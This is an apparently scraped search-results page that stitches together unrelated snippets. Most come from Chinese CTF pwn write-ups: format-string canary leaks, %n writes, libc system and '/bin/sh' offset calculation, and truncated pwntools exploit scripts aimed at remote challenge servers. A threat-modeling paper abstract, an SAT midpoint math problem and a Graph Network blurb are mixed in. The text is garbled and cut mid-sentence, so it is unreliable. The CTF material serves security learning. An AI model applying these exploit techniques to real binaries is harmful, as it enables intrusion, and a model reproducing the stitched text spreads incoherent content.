2021年10月30日 · 解题的大致思路就是，通过栈溢出，来执行后门函数，canary用格式化 字符串 来绕过。 sub_4008EB ()函数存在格式化字符串漏洞，利用该漏洞来泄露栈上v2的值，来绕过canary保护。 发现偏移量是6个字节。 io.sendlineafter('3. Exit the battle',b'2') . io.recvuntil('3. Exit the battle') . 文章浏览阅读706次。 一道攻防世界的pwn题 Mary_Morton好久都不写WP了，太懒了，emmm，以后坚持更新。 用checksec查看保护机制这里的11就是本题，我嫌弃题的名字长 …

2016年8月31日 · In this paper we introduce pwnPr3d, a probabilistic threat modeling approach for automatic attack graph generation based on network modeling. The aim is to prov

Abstract—In this paper we introduce pwnPr3d, a probabilistic threat modeling approach for automatic attack graph generation based on network modeling. The aim is to provide stakeholders in...

2021年3月31日 · 目前，CTF的PWN题越来越难以PWN掉，漏洞的挖掘和利用正逐步由人工向自动化。 本文主要介绍自动化挖掘的一些实例，来学习自动化挖掘。 然而，目前angr框架是个很不错的选择，angr是二进制分析的一个开源python框架。 它采用符号执行技术，其可以通过分析程序来得到让特定代码区域执行的输入。 使用符号执行分析一个程序时，该程序会使用符号值作为输入，而非一般执行程序时使用的具体值。 在达到目标代码时，分析器可以得到相应的路径约 …

2025年2月28日 · %n是通过格式化字符串漏洞改变程序流程的关键方式，而其他格式化字符串参数可用于读取信息或配合%n写数据。 发现这里函数指针强制转换为指针函数，会把它当作一个函数，执行这里的代码。 查一下偏移 这里就是64位拿‘AAAAAAAA’去查. exp2. system_addr = libc_base+libc.sym['system'] print hex(system_addr) #计算字符串 /bin/sh 的地址。 0x15902b为偏移， #通过命令：strings -a -t x libc_32.so.6 | grep "/bin/sh" 获取 . 有几句要说的是啥，第一行 …

from pwn import * #context.log_level = 'debug' r = remote("111.198.29.45", 54649) #r = process("./stack2") r.recvuntil("How many numbers you have:\n") r.sendline("1") r.recvuntil("Give me your numbers\n") r.sendline("1") def change(addr, num): r.recvuntil("5. exit\n") r.sendline("3") r.recvuntil("which number to change:\n") r.sendline(str(addr ...

2021年2月22日 · puts ("you pwned me, here is your flag:\n"); system("cat flag"); else { puts ("Thank you!"); 显然， pwnme==8 是得到flag的关键。 双击追踪： 接下来，就是要确定偏移量。 printf(&s); 即：printf格式化字符. 因此，利用 如下，来确定偏移量。 p = remote('111.200.241.244', 45138) addr_pwnme = 0x0804A068 #pwnme所在地址 p.recvuntil("please tell me your name:\n") p.sendline('J1ay')

2025年1月6日 · In the xy-plane, the point (6,3) is the midpoint of the line segment with endpoints (x,5) and (9,y). What is the value of x+y ? The midpoint formula tells you that the a segment with endpoints (a, b) and (c, d) will have a midpoint at ( (a + c)/2, (b + d)/2) So we know that (x + 9)/2 = 6 and (5 + y)/2 = 3.

See what’s happening on The Graph Network and participate as a Delegator, Curator, Indexer, or Developer.

2022年3月16日 · angr 跑个流程图出来，找到返回块，往前找两层然后跑每一个块来定位到溢出地址，然后记录访问路径。 分成四种情况，其中三种可用 unicorn 处理，其中一种用 angr + …